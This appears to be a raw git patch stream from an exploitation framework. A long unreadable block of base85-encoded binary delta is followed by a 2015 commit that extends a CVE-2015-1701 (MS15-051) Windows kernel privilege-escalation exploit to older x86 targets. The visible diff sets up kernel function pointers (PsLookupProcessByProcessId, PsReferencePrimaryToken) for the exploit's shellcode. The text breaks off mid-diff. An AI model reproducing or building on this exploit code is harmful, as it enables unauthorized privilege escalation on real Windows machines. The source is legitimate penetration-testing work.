z$eox^zFzdRf}toLo4i;=eIu6QJS?GZ#0v6XVhs5ttRcS}CGu3*O1>O-;%~%I+3A>y
zO%(3IgII~J)WtW)R`Q2&Ke-D}l2>6Nxq_YK&)^08FYLiG)O{!EbFhRBABKAJ|Aonz
zjcMrLLZh4ohNGFnCah(}R!k@VHCE7{fOE-naRYfG=9A}P5pKm2ticL=4r{SN$nqnw
zjyxZ?l8?m3@3{Ww(`e=cRou@4)!2f+#ddrE&){}!;EkiOi+llglTXCU<V7fbFX`U|
zJs!anY(fS1V><p3v+x);o#*-=O{0)P0g8G4?^sO!7FOXKxE*)lUVIAo^TA`Vjr?is
zz=c@Oj+pQ)`GeR=o{rt*k76CU9i?8rKSG0_f`djJg@>@26(?g7`65ik)!0gXEGp!8
z;RfDkL6v+hcG91MndD2boqQZ-lNVwI%bT%~{8=o=U*R1|bWEX9OJN0W$9u5>BXK`|
zimh0SCvgXM;_vYS?#3RRg}NVtzyIiyVf+I9_!sw%R``WntmVhQIxdj9TR1>>KR#iE
zrhJ(s=V`OQ920XfnR$0CbL6xyll7;@OL~5=3yC*<N?R;9c-DlUiaFXFUyhNFX{Wy&
zuiKf{_b$0W8+CDf#A|kK^u=-VKeYK5$Lkh*!hJ~to|?)1Vy5WPt>Om)J|!utf*+`>
zw9^;I^Y0R_UL3DKx%{VJ44$Q}6<$o@XV@9t<K>y!VqX2)L%iOt?cnu&?J%#Kw7-Qb
z@})6R#y>F6X%j9Dzy8O6PO+YU2qCizKSnt@|L<O^AYzz_wrUG6-8i9(?8m<${FEUz
zGnNrQ)edSeT^jTMe-iqC_(|yMSM|Z&Uzf^*N69nGSCnS0xp(QZ`|l5q{pN`7_urMv
zmYAd5p$P7)`UE10NG4K<RAL%oCR8Gm$R-N3cfTL$UrVcks3JBHHAF43nb=Cy5sk!N
zqMSHLv=D8?NurbJA}$lsF`li67$Sj4BYr&kX4)!|LChtxiGpL&IDHX~Vqz^(Lu@CS
zh!*0cc3<z5+m%)(8X}#@B=U)3qMV2!s)$-*JJCoq6Ya!VqKA<9HWou96B$IlcDi?q
zUjHFGc$%U5m^BUM2k3_)?hJnP!>t1*4_U}v`2QOFZq><GA_j=n4EytzTcYL3x`aQA
zOYOS^ZS8k4`)Z@*-8%oLmUEWxEwR>k>u76=b-LATong(i=2;h7eb#%e<yOD-EvwDu
zw#~NPVOwZhYkSnT-S)h#!S=H4pzVmQ(>C62wma+@_Eq-#?0$Q-{Tcf!_E+t1+FR`J
z*gvrU-G0vggFVtQ%yFG#y2IsI;8^YWl{4tv?|jR7#W~28=y#2G6}ld9J?DDerB^4Z
zUiEpkT|MYgy(_#syf1pc@^ZbVa4+C6#VP5^EahJ1QRR8%W#tX!Qzg|<X7C$!7!Ddf
zH2lNxogu<F$e3WX8okDu#yQ3n#s`eQHa>0KWo$I=Grnzn&)8w?GJawF${1;iF^w{f
zGfg%571In;xv9dWnVvP(n}Vi8rWVutrqia2CcU}Ie9U~(+-dGMUol5pCR<d?EX!O=
zp5;M{-x9FYT3)eyV)@MSwWZf`qcy{Ni*>#AH`e#8UsxwHUh8ceY>(N_+LG-z+AHi$
z_ICRf`vAun$0Wy8hrwZUY;)8(6qnb}zOQ#3b)9g1;`+kX;~LKx*wkG0K6Ra1qdv)K
ze4w6I|EZ31XSnm-OWmdJ2i=dlpKxz=|JJ?7z0ZBr-R?f+?s9+S?r{(IT<4kQF?;5E
z?(!`2tn#e!{K`||dD!zCkLG#Gv%|B?)9BgjIp8_uIp%5eobY_)`K!nOndb}7SDqe^
z<c;zU@(%YVdB=Gtd#8F0UWeD?&G63k-tNuw-sLUwuJo?){+D;1x7z!t_c8BQ?=#+d
z@9(@#-q*ZudXIRIdq41=@}BXY^`7%y^nUB@^-4T0iK{C@iB;m2L}jcpQAtx2#iF>B
zo0LrDRwY+i;8zwaE0onrsj^miNO?qgOxdhF&GG%M@{;nZ^15<JX;t1;{-k`Y{7t#2
z{GjLzLk*)1UPHE_#PGPG-SC;A*B~2{jT4MBjEju>jdM)%Oe;+rOz)UH<^|@(=2hm0
z%$v=-%|Y`a^E>8C=7|=k#b>$4@`UBLmX|CsR{tVvl5LJHWSePUVBgF!ig%<qvN=!h
zbNtG2!g1Qs>G<3catv`MIVU-9bb6gnI9r^5b>5~fSD#gb>S6UA^&54q`vvzQ_c8Yg
z_c?c@XPjp;2f^XV^gO_zcX)<)CwTXGKNBZ%I=35$Q}Wo+`wV*w2mOY(40hvUW2v#q
zc*OXz@iU{$xjDp?Y?^4YnKDh;rUj-Yrgf%AOs|?+O(V@S%w^_{<^$#tmNAy;mN}NY
zEXypztRt<-R+DwDwbB}}es7g*18s@6(Y9H(xm>hMZBN>^+3IY&ZB4clw!hjww|!x|
zYP)8Ow8z+o+WkfL74`=EOZM07f8d%uZa-x=IoytX#}dZ}j#&2D;8a~pUF%$rx}I{?
zyIys*xc=xm<NBxT8<$QUqMFrZ>KgS|>T_zF>h#R_lz9A}E1q6YjMvLqQ_ltbDrW?{
zoW&zJL@6Vc>pA|vQ0`LhQ!14w{T%57${&@#D80%MLyEy@$S{0l_F4{EUbfD#{h9+a
zl*6*mKFsm1^F!xH&TG!WF2yy&b+c<8o3+AK?((}Hb3N(W#>Tzqdd0QR^@i&Rn|RXo
zvFq=y3$AOf5o$8m)Kt}?rmL0eHg&HW;f`_N;C{gUoV(TSKjl8-PVxjjAA8Puq(Z*?
zamGHW1eLb%N!O{IRl1a+2Ad(rP+%xD6d8PmVotqMLpcYo)zHQ%c+%ixx+yf?Z7epH
za3G&F9x`4s_85DOl1azGj5Fy?38qD+B9qTlY$`F0u-ssYu%>aqa;y!0Yp->&?H=1_
z>}ibs2KyZQ9rj<^AGQbVPjN8XnLx)lCOD=rd72y!N4n!?$E}VWM}cFhW2Iw_<3Y!I
z$8Q{49NQhwI~pCYIgUC`IsW0e$O${p8SlJ~6Lz*M&$Zh1OIL$yusT8=r`pv#wOD;X
zeN25y-K93E{${mX9qgX!PIuqpe$n0O{?47^srQWZZt;HT{X|^FeAD286;>-Q!%D;b
zhU114hF6TQ8{akl%~)@0H0?JZHos)~)*`V_>#YZ@D{Mp9ky2*8-`d|`7rwGzwa;|S
zcRb_R<xreXXATF^>{{yzxOThV@VhR%VpT=mt$wavQuXda_kHeacfeiiRz01bHtz{0
zm5;rD<MKJrwDOJjs`r{#s^C$Z4bmww$`ECklB6UvwM<rQ+!fjl9fk_iF!MNbqj|5n
z+5EnFfn|;5MN5kH=eApHU)if1wT^Ml$xfqlhVxzLS*L%TYnN*Pv!2*Rg_YJAYmJ+Y
zTaDX|b;g~>25ucq#=T4|+iYLiEcT0zCg*-;I~J_tIUgo7BHIiv8gfkcn`*d=Y%|rF
zcA6SYADF&1C7P4XDdtpjnt7U8F`LbH^Lq0JbB(!{Dd{_NlqJP7<yOlyi()Zba=4}J
zvFx`Tv@}~<EUlI{OS|QyWt=sYL7iq*th;Qv&TrLM-S4^o;=bm#GNVgPd~sm|-nS2M
z4RuZ6dRXgPzvYMF@~G${htE;$DA_V8L7t+|aL#pRI}4mrJKvO8eoH}u+$lG2aVN^>
zqPMfHji$Z(rjL*h%S-k<o1LxBcJV#Dn{UdXcPF@;+{vC4kIz%(+2Cp52GZ_1!~G)3
zYxm}R%efEi_3rm}crSZ<#HjE9p2BOAVplShLZw2fQ<{}dMdH#{4e5q`nLOspk1M+W
E22+G!!T<mO

delta 11620
zcmc)Qe_T{m{`m2GVbD=gM+HK~91RtV);quNaOVdlDy?jeiHL@VhVF!Hnn6ot4TbFL
z4(`%kH?6h84^-C2K5F<$Dy#8FibX|bMrB2=wV13?Sz(d$d7U9!_VL*7_xpH!|M~Ff
zJ<oIA=gggZ&pr3tJCjv=3{`s!b=?!LOkX`;`suGjikmP*PL!k_B-ZyO-`7XT)2<B8
zlchLGk|oI$`|qFjRTWv5ig-gUdi49`w1jLDL-l*&Cdv_gx9pN{(@)D&<oopzadYIN
zrloOv6GDawvZ*Fgkrq6(Uor*jd5I=xMkG@pnrwsy(Y`p^F+be3t=Ifh*Sde-RkZ)q
zRl2y<?f<^3XpeQ(Hygjb`e}B0p4&Bi-6je_0|&UV=G>3bDEnY%AHpp)N6Xh9UN=<a
ziiYo<b!m0P9DgLRvE~~R@%sav59@Ca%CKaJzU?(1lwUP<ac|fmc0bs`=g*5CkDt*S
z>=DI=9(FQ%Jlq{$(K}DK4!-QFVA6q$$ILjy+ad>pW->n=f9$i*RNrn)49f-KTMXfV
zvD{#bEIDX9x}fH*^08rWmws^Y>d=Bf)KU8jHl5tT2ZVcSqLo=2XY>S04gE411<{J$
zXmV^9Dtf}*eZ`<SsR7Z{xh5KoRv$7g2_Ly3{ORI@)!uG4CRGgY+(^Tb1W{vfBwOTw
zN#cw|9jC<6I6BQf@yQYg9Cf5~n5Dg)&tHg*UlO&&(Mh5oZ@8x`$ouCNEGP+kQ`u0d
z6uv>>eCwYK$p|g#jYjWzp^^9P9w$k+8B3$l<aDvg<TPFbol_a?h3g{ahSCdXK8+@u
zNj8W>?#!p5K^*pxgmb+1uwh2hQ2OJU7fY2z;a4`!XgMrN+1FH@4@x0Pn!90s%aIvv
zb1xB_HnD#jW^~X+zcX=SsEhZ9r)QRCC$x**GXxqs$wZSA`LLQud1dfs@h%Sd;_=!(
zXb{IX@8`dQdC}xlHrh9Ka=52raJ0hM`OFW|=ov>aGj^^Owst0iw``oTBM?ni=pOE=
zjz-J%w4s;HE|pHVFbE7+ct&Dw`MB!Ngo+X2Uzx%)j15LHuaB0;ZIEq|?8OHXC6dt!
zQ!L-<<z21+@~4M}_R5OBc9_eQFNUkg&u~o~DM<|`{opX$<%w+WbO%S;`NU93I&+j^
zTfR*sYa(~wo7*5t)ysROYHzk~9{!+Qs6Rh^z8ug;n3Bedw&Cke@!nXE3vziv^@X?!
zM|h~JXPdN)eVom3&xX5BRbP-RGHRj~>GJ|&AR5WfTOdmBa@w}3dV}doS#5gLbVim}
z>o1H9$=OZbQSq`|q+gYEjlGcFuD;d~-7w(Hpn}d@he*;w+qVm%$;ISv2p?W@u+$jb
zazQe6ZWtj+;R@rCnMK+9i%EOsC-mErXR^mHBzs47FzTgJG`Wm7aTYHL_8icMrc6x{
zv#YgWLDUgoT%yTAs$oZ_o|iH%C6mLOSJ3&_L2T8LLB;mLhH;sCC}nJ{R?xYU7A89_
z8^($D&PB0=Srq3`tbRSZVVr2LK9sm&oLPS(WwczPpHBIcr|w7A&+^ehVdw8Ba765r
zm?Y6;ky_Z<cp0luK9eGt%}eKNjPXMHR7?*J()V0a#AZgMJ|b4s)RZx)e1bfD-BJ1+
zNyruzN`IJP`VWu(Noukj)W1ueHl>6Ea}O;4T>D|otf)(@K4LUPcEiBv@xH?kJA(SJ
zMlX|7^<ASKqx0BOO=S3A_J{W$tezxl(!tV_V8?}~3!~lfOeuBTjRVB7Hl#Ie8~3m*
zoAm7Q&Y@x;*wtwHD`AI8uO2_$W+GG2=@-*vk|;~nQ&>KZBos2@VpkVlf5Vc4(b$-F
zj*j)p(9e&bEa&NF^Cipy)toOEHf=P&C5Ma$#RVIQog}fghI@kPq!vVv+Y;K+WK&QP
zwT6gTi!P?rSn5#!R8B0_(mxf5rCR%^%3`UueyLD!Z7g@JUoKb|OSSh;ZI7i+^iM@%
zsgC}sW3kk!{;6}ZRA>KG;vsQFU9nW?r=v`d<+}TKQ)8)f{Zb7*RDyXT|MOS`W4(I&
z^$M<!r6e)?FOFDaEM@4QIuuKVjQw-%v0P&R)VWy7)IVi>S?qsm|5R!$mDE3#5lf}@
zPpPq#xqm8@8_T8l&y~bd8U0h0u~cUN)cROT>7UvfOWFIS8dNI59U}kpShU7^dHQ-a
zy`Mf&o@r*Sc}cvS84@1AbsHCLt3GVdzFYGp^SEHaiy5L_y!^ZNpVsDJUDMT*?}|&5
zqFmjTtb*0vyrx$(?ueJoO*1oV<&?ltZkh+T<@J%<M^01cmA{UYv-N=Ts9fCit<q}X
z@;>NzIB7i{$_Hmx_gu2(OIu{|!LZ@wTD`)#Le9`nIJ3Ek#<^T_tv=tCA#c*}rd;3j
zjH_54P{rp5>-04Dw-d!$&>&X9hCE(szO6_oO)Xq<uzE5VD{E|GuwJ)k<??xVW!*jY
z=gzS;OVl>bHf)HW%aWp}XwKBw!t%R}F|2)u4b>Mi)_fLQrXzZZW=RXo5?66-6Ves3
z>0s<J!a#}jSKqC9_>8mKW$_(RNl)?|p!Tk(Xh=H?c=*i?^INx_(0$%9vHF>hVvCr5
zqxWXHO@GTfPp)g4>`Relr|$JXB72%X^e>KM9nr47l-EU9Z{_v7t8*ES?CD}<DV#oA
z&TDF%e$x;Z)M0aMp`H)Ko^{1m7VcM*qsc{-t9up<uPJ4zDkup4YmedUcpjF5rW0by
z#2!{zG1vLY1)^^U(?q(#6FV@mT8Ug{ESLQ+x$Iaj=L%Vm%t>Om-kCGYByL2d@n=5W
zmP^<0xS*aHIL_Y3&%IUNqW^YohP+j;=e4rw=-k%0{N|<XcgJ@};#oc`lJ}pEt3DZD
zecrg{@~<C_rvF8>)`gEeCt9md8`dONcf`lHMAK_pi+Nl6#um|zdBPLqj1)5U)A<>4
zvp#bEBwp3|<I=@uHeMs`gssFTqLx@ktR>2cGX3`X*CdIK;i%YZ8*zf@UaB9TU!vvT
zC>p+dkIyntWMdci>U`f`T_N_Wa9M1xMCZC7<yvBoUQu9{^Y!}+rt%sou%wG-Hedu3
zkxH0}3_>APVz!>V;F?i=A6i1aj95$5HQln{zBpOZ;}@Ne>sg^+Sac(mW!G2p`q}k4
zaz@h?MTg`O-Mw6!tvpbP=U|>Oa-UujiDNeIFAfa}aC*2MbH6UqXD?kMuWx#CsXb24
z)jz&*98>DY8{6XecJum*Me#7TG+UOp>!m9j<raN-+27=xrmxGq@{sJljSOcaP1?<?
z<YZ4QQGRj-k94sQH3d7Rrk7S_$V1e=zJtXFeziK3Eb0eskwBm{p8tZJ+3a9d)9-GX
z8F&4TKTA9YXL9Xr`74*SxCoCVD7;SHDjMwKqKuVPO2&ui;)!+1=JmDMdvhpV73-2q
z=?S)SBq5K|rlu+7p&|0xrpH5{4!H8cuw?2YX4Xok-xBS_^&6Q8#Jj|^#OOatreVb2
znx6gLNrSwpX>0h|A@eI6|8LV(wEo-aTH6qt80$qlQz%imm0Sza)u4Z#KP9fRQ6Duw
zUErRdHc4!WIkF0hh<qZC$RRw0oycs|@0g#PBzlIUu`N^DO6+PBQ`VF8*w0h;(4+sy
zDVs_Ydn7v7Wl+u|${*ElD;OV_^q9W6AVaXfK$#?ZutzPlw-N0`2hmA%6FtO`$Mlp1
zxug0%IGz5Pgog+;Ssq+BaOzeb5YNn7QGHjHR6f$niH}qasX1Dq1RF)eQ0+j)B&rjF
zJM@pXndLoA(QN~V%0_+Q&hvU*+=x)TETs_Xgp<f6@`++%4e>i-EAb?;k7y%4BknND
zQYleD%p~kYI$<K7;p=h>@ey&BxIhd`kflorJMl}Rm{?7O?&jrwVmt97(N26tBo2_J
z$;8z}F|nSgBN~Za#EV2Lah&*^h#M$NV~9+`NnA}_ODrSqCjLOw6HgN_60O8X17)jp
zj)KHquP4Oc!|ZJ>aR;%2xQ@ssGKo}Tux{BsYQm4IWcqT3WV&uP^Jb;^^`q~v>n6!G
z=Pt?gvc7!xUHXOHDSF55v`Z>(UB1R<{Y6PxnI!#sUU2D}<t5kLykb?;?59T$9GcI)
zx|k><D)n2Q)k4{?Fpg}m9{JuN_26I(yvpK+TafQIQaAF=O$xM1rcok~;yZLViYMpd
z*Cf*z+=XM&{JLaH!#cbaPvCfwe}lymJ8^;}S*1XmWSU4K`z>|}x8v>Df_LC4>_zEq
z<~bOf7C+}78EXDqGR0Aipt!lTpaI)30XuL2cH%(nMsb`yD2`J)(|4Rk<ZB(%S2FRd
zlaz{l8I{a93^Q;zDk#Q7MaCl}Wm6CXl8a(M0+@t_n2g1kf<Y7mwHn1hRiYTEDii~?
z9%BQA{O}-cK`~(UC<bghnsFC0U{W(q6h9<HC|pLO1=Fz&Ct*8I#txi<oj4V{@pA0J
zD^Tj<`UWFji6)$espv#Ax-bJ(RM3qo`uKb)n}Q#6F&hJT6&B)jEXEuR;!IqPv#=7c
z!7BVEuE*I}hu7j3oP+fk!0lLoyKn(EV`veD2!-X?A`;k!GLzsK#$gA>V;35*l3AaC
zJ=6!F;UCNmG@%jGa1g5W8-f|s6VZ-CF&l?r-an*}X*h*K5@Obs;0P3#*GLqX*C<>~
zJ_*-iGOouI+=QuEkE3x1j=^Rei-#}`+i)D7z)P_c$K$zwgqRc*q_a#4OvH(pikD$J
zrlW$B(1VjP7pGu8PQ_xp9Lw+uti()QhgafOoQB)cihIzGkq`w3g;sQ8JG$@`s@RQg
z?8PiJej%AOOhO-;(T|y!jVfM+IXE2yn1ex_f#o<8t8f;EYAIYpVGI5e8*w)7!aUrE
z*J2CK!DAS}4!jP#umF2-0UEj`(;`g5<(Q5u(T-)9gZE$nWh2*L5d{M)idaquVvzbE
zEXToEg^5^;V&&O_qp%T^a2KZFJ{*HBI1W276T47D!<UR0ns7R%;YuUZ-A+OLP@aPZ
z4B$X4!a*3s!B~!oScPM-7By_dmADJ}Wkiag0b6k(w&Nf?g@dsh6R{V^geVxlVndjO
zGD}}N8c@N3=)pmli-R#A6R{Y_U>Rz-4rP|eO*jbaaWL+{L~O<}cnCE-fgzbSvx~wY
z?7_ik_?nJrLJc!eHZ!?!5a!@u42X6t67A{ih-k-3(T?jxJJyNz40cGg;||e|&0ll<
z%bDzvXuvknfG1E^xK2eL&xt%r=g8Z+OmPsV;$Tb{d6f|pb@Yh3hY=HX%op`+MoiSP
zOqj!tp5yu-oXehyL>_x83~;@oVJ+7yj=^RWtK!w{gBjUJDMIcR6n9XNTB)~VJHC&n
za5r{iJ@(?C(D;pHdIOX29kJY+DZGW5_ynr>Eau=L4B!bYLUBI`Vk?&8OIU?1Xk^F4
z4XT#<U$GHaqPVe%JKjF(H=?-J%OX!b#3)F|DBOh|xK}jLK|B-mP@f_4)D39(w(rJc
z!rxOD&jjKbA&okN7<)Dl&k7mT{{!uKA7-PtQRQJ17UF**_nT1cPFF%AOhP<Vh=+`F
z>f(+jvFAppqTYbDD1JxXf;+GgkK!);Gw#FZumxYnW4H%9@Hlp18}{IAG<?VTk5Dju
zCz;+xBOf>j)2P3R8TcXE@m<WuS1=F%8w+timf$g5jg7b#pThO{F>XQ~>#+lO;PcoV
zqVPI}L-+}{;RkpEKf+FY56|IY6b~hrq14lN%QkV&#luJ<^)eI>C*q+cm3k0O)CXfa
z^*mJQ{|h1YTQQVMhanU^BsO6#K8pGHUs#O4!ZLgYD{&w0VnaS$M}57>Q+Ht<_1L6l
zyNT4dQWp;+D(&K_Xgl?CtfHMYC?xG6v6Dmu#luJj4MVY&`W%#aV+OQSFU4ls$KxsL
zOHrXd47;gw<;ET?hhs1Gzo7BFWSWcF^b^-<67}magY8}^p8w1w){w|0VZlu5l~_kT
z3svg(igq?I0>xvKA9KiWz<ivC0rFNXrhYqi(ti?`QU5iH=g4%dq`m^z;UC3NrSirr
zu#UuUa4S~hcJkuO;dbi3!!6V`+(UgGW>Z%%Lj56Z#ouB(R^Ta|j{!b-Bz9B3AA2z$
zjo)*sHd831!zfH5u@P6ZVJDiY-;KqzCt)V_0t`}5MwR*k%)u=fz*;QEM{qT67t%ik
ztEd-ZCG|_N_Is}Xg%s-fKo4%ALk%|K<G2fN!+p3F*Yn2F*h2k!Y@<FAk5Mnd4tx>2
z@gPb+@FM`2uo=zxDk^vc>&|ffkD-uFq6o!0|2NE|egI4G1zd}d;U;_lxA4JZaR>DW
zu^AU*AqQf^L)7oU2=#1iqy7i1qOM{G^(tH+BH^acMdBW;XTxdOLwyMv_yOx?+)jQR
z@)gc>0|t4Y1JkIl#R%<Y%%HvucTv9-?bM60nErOmrv5M%;+=S14;`maSWV(4T#Ku4
zJ;vh}Jc-+}4)@?TjNsGQicexY&csu_O>e#b(MY*b-~EqOV@&*nF1B*<uZ|0(?w8bl
zecyx>J#aQvo~7S(cC7K^G|6<H(DTlwnGTPaO#EaQ6>oZrvgkL|IpLql8TyB3$I5&4
z^Jm8!Hf8j^iyv0qUyP4?Ox3f#xKuu_-~PpT!(3miEp@;KzV&aNAzBRA&+N-3tmYT&
za{c@l<N4<dqr1nO4z2j-F9Lt0tXF-J$}fIPyT{88{T^Od>Dzc+pzr7PCH)g#@6zQj
zMP|a6V-qGm&w8j|_2sCk7ylK;GXDL9%pqKiLh<h^h+@LXN>r)e_2sk)Ez~al_3|T)
z6k#m+Ve{hOllp64jtxn){4f6G6O#USfAX=({~tg3jQ+Y|=xBLH<xS;*HLGr1e(SAG
z&wpJZH~GFfVBl9Y^V8o~%JVy4=Ic7qO`Icoh+aZE%o7ihNF)(yL<V6eJVY*$M+As`
zqL3&eiir~asUI#0RZ*%XHW8wAE73^oAodUuf`89oI!1I5r-)AC9AP}t_kbqmKoaFN
zBAv)2?1YENA@YbKqKsHe)Dexuo+HvQQwxPQqMhi_m-bG%N^RjSL?O{hwggubYl&K-
zp4dekBHD=#qLb()()o6#>hJY#HgzB4_V^w{^*)Z^{}|sBx2Wm;AFmxS`9cww=>IeJ
zUTcuQjT;~~^VRXqzZ@t}Hk>=o<yQQClD_tP<KDV~@{@+pM~+V&-#G?2hd5K5Y0k@?
zE~n3#=e*9j#JSuVc1o@Ru2ffs%jTNrTI#yhb-OF%s&VPA2VKpsZ(KjPOlq<^UY(={
z)B?3cEmiMTH>nS*4eAr>PW2hJMSWd8sdlR0sYdrmx7nTTE_AQVYRKB2^>o%}SwCbY
zXv0HVKwF{xNqbV0JjtGEo<Dmco*lkS|3d$L{s;Ug{k?upjhS_y3sq5^$_>gL%Ab{o
zm8X=qlqAb?%PPx#mK~OtEypdNTfVaVU@=%HTc=qaR?WK5y25(1^$*tjty`^+TmReo
zqP4}^ZvD`D()zWv$2!P1%r@3$wuLOVpl!9S+V)4AZfmgZwC%CIWIJm6*e2QQ?R)Kq
z>}~cA`)Bs=>?w{+htuJ4%yN`ERypo;R5>1TyzY3%@i#}8W4zPu%yO=A-tBzR`Jr>9
z>q^%eS0y8L%$3OKtXAvQi29lOtvbY=>>lf$;GW_RyX)L$ZJM?sq^;4O(GF;@YaeQz
z+Hl5Tif5*0spmJIwVoPAW54I9=Y7vGuicyLo#!p_mU{2--s@fO-R#}wecbzuH{w0)
zZTFt^c6#G|qkL(;bf3pJ$2Z@1y>FRsrEj(GHs9U8YTpLmeZKpBTYZhbCwx17dwu(S
z2Yj#i-tfKS3w`K2>Fe}$`@Zr0;EVSg{lokz{;~cE{;B?7`0aj=|0@41{~Uk5f02Kg
z|JVNC_$&N(_(T5n{*8X!|5ty#|1tl6`J4RD`uF<}`&<3T{O|cc_W#}A<^Rh6y+7)g
zcx+1K)FmiGm61xSVpb+8S12|`ReZ`!WwtUmq%2gHC?!gna*Og?C8VrV{=oU&tURPV
zsywOeRGO6+l!MBv%A3l^%0HBIifkEdnP$nc6kG1GL@e)Ex-4H>60IYw7VEXv?N-e;
z-L}Y9X?xE03;S&QT>JI*TkPxX584~-JMGWeKe3N=T<$1zEOy-M*z9=7(c`$*88W&w
z*B35_I$K@GIf|+#caD3ud#QV+`+)nXyUqQs`wRC4w=pX@YkbzUtb4QeWWAB)_Y`>k
z=xOlm_B`kL)KljDi+87YulIoWJ@41vVZIbj!c?E?Tfv~W_%8TH__z7r>6^&e;_HMY
z&Ei0pTDCE9pAK0vtaGg;)^cl;^;PRT)-Rcx7p#f4k+vx|)s|zMZM)9)8{2PfkJ_4T
z1ML?3a{KM}C+q_pLmcBAnq!V*z9Y^#(3$AG%vt8V)p@7$jI-N$-kIPU>~gw1uB*9h
zYg}Ph9T#l9>wxPG*SoF{U8h}VU0=I;T(X+4h8C(@)Q8l^)c;iXsL!g0)yv#hx^vyv
zx%a!jcPD2}$ja2_X}{6#&^Bng_NcZ;dtPhR-q$|W&S@94bkBUxGS5oSpFI0Km;0{q
z75i5CKJ#_?dVJHEH98mYqs)kJ#3dZySrY~-qdEUxWsb5`xmBrAHiwial;@S#lrH6h
zVzNxM*e$Qvr#W^y9(Gz>H*;cSPRrwJoco2Wm$P2UI-B)lmRYlCE^RuywNMLctF(|-
zqlMYI2ee1D$F--lCU)_V_Nw-_c0xO=4e%s#O^x+T@+h8LJz-Cy=POT-XN-4+_fOtt
zuANY;*XV2Tz3O|<$L<w#8(_B9C=JTK*tBa?jw$U-x+#_!mOM+ql5Z)r6fyZqEJ4fD
zmS)R7CgCB=<t#V>>jG<$wU|>`W8G=}#M)`?vUXd~aXNdglFeYd)|PK8v=!NkZ37%*
z9A7z7Ib}1PTSCq*=Umrf*E<|*k86yosaLBvskf<jsv9^R5%p~rjS=ok+~eGrxu?1n
zx6AEw&v56t=eZZTm$^&bYutCcfA6k!|Jl9O{h0e1_hI*O_s2}x^X{m76jRo%&C-@=
zH)&h69~p~bo(#_{PmyPZC*;}Sx!+Uo3GMQ9cz*PZ^(x*h?*ra8@8@2gu6zUizxTiF
zf1T@?QCZEyDJ)U0uq?9NXnEFh!19RoN$U&NH?6vDt8Ke|xBVf<-yPi?(;DX!&V{ZE
z97qZ4-e&bF4&kJFT6MUuac^|r?>1*$o;8Ehn68y+cWMu6PldEo+V`5-^PuNl&nF(q
z8}KgmR(S99R(UghZN7c}11u}A`rqUN`hbPyQ~zoIS^qhIkN<+$v8vd-lHwGjlF0Is
zqD<k=5V5paR@>t2!|Yq_jrLvkm+Z40%N!3lOirsS%XLyMcUQTGWu;_I%(7&?kQF+X
zHB7r-`_^X^8?56d18c2S)^*nP)>><wb(3`qH;{U3Bg;$Jb<#CS{n%ZfwVgGOj`gv9
zkWv_xu;l^E4BL&iwcJa>wmRD;+ZNk?+uv;o_C&kMo@7t8r`gT+bbE$<jlI&o)?UTJ
z^tt_;klp0C#F6GOJJKC9xUp<=Y<KK%>~idJG&}Y=B923jVa_CHDz|2{^M2RNtiO96
z^}gtR&3o26nRQ*-#g|(4<0bXmELj`DRZ+(MghYgIR*+-KjZNFWDVxKEo#zfPTQ)IU
z8r?hGd)%8ZO_C>?q&D&Gp9A--^VE7ac{T@<<PN!cvn5$RJ#dSy-nQMgYwv^<dB41f
zUfp~l6?o2h>b$*P$(QRZ@dbVBeVcr{xV5x%{ipg>f1$t9zsbMF-^?1&&M6ZQ=w{xR
fs-!E~O0iO<)GHCCLy;_L7BjyG?9EA)o8|uj&`XwN


From 2206a6af73317a362e07d36eee86cb912028eb61 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 24 Jun 2015 09:18:59 -0400
Subject: [PATCH 0550/1013] Support older targets x86 for MS15-051

---
 .../cve-2015-1701/cve-2015-1701.c             | 136 ++++++++++--------
 .../local/ms15_051_client_copy_image.rb       |  19 ++-
 2 files changed, 87 insertions(+), 68 deletions(-)

diff --git a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
index 9f25a2fe08..c1d7815f83 100755
--- a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
@@ -35,7 +35,14 @@
 #define HMUNIQSHIFT 16
 
 typedef NTSTATUS (NTAPI *pUser32_ClientCopyImage)(PVOID p);
-typedef NTSTATUS (NTAPI *pPLPBPI)(HANDLE ProcessId, PVOID *Process);
+typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
+	IN   HANDLE ProcessId,
+	OUT  PVOID Process
+);
+
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+);
 
 typedef PVOID	PHEAD;
 
@@ -65,19 +72,13 @@ typedef struct _SHAREDINFO {
 
 static const TCHAR	MAINWINDOWCLASSNAME[] = TEXT("usercls348_Mainwindow");
 
-pPLPBPI						g_PsLookupProcessByProcessIdPtr = NULL;
+lPsLookupProcessByProcessId g_pPsLookupProcessByProcessId = NULL;
+lPsReferencePrimaryToken    g_pPsReferencePrimaryToken = NULL;
 pUser32_ClientCopyImage		g_originalCCI = NULL;
 PVOID						g_ppCCI = NULL, g_w32theadinfo = NULL;
 int							g_shellCalled = 0;
 DWORD						g_OurPID;
 
-
-typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
-	_Inout_  PVOID Process
-);
-
-lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
-
 typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_	PRTL_OSVERSIONINFOW lpVersionInformation );
 
 NTSTATUS NTAPI RtlGetVersion(
@@ -230,17 +231,7 @@ BOOLEAN supIsProcess32bit(
 	return FALSE;
 }
 
-/*
-* GetPsLookupProcessByProcessId
-*
-* Purpose:
-*
-* Return address of PsLookupProcessByProcessId routine to be used next by shellcode.
-*
-*/
-ULONG_PTR GetPsLookupProcessByProcessId(
-	VOID
-	)
+BOOL GetShellCodeFunctions(VOID)
 {
 	BOOL						cond = FALSE;
 	ULONG						rl = 0;
@@ -248,7 +239,7 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 	ULONG_PTR					KernelBase = 0L, FuncAddress = 0L;
 	PRTL_PROCESS_MODULES		miSpace = NULL;
 	CHAR						KernelFullPathName[MAX_PATH * 2];
-
+	BOOL                        bSuccess = FALSE;
 
 	do {
 
@@ -278,12 +269,12 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 			break;
 		}
 
-		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
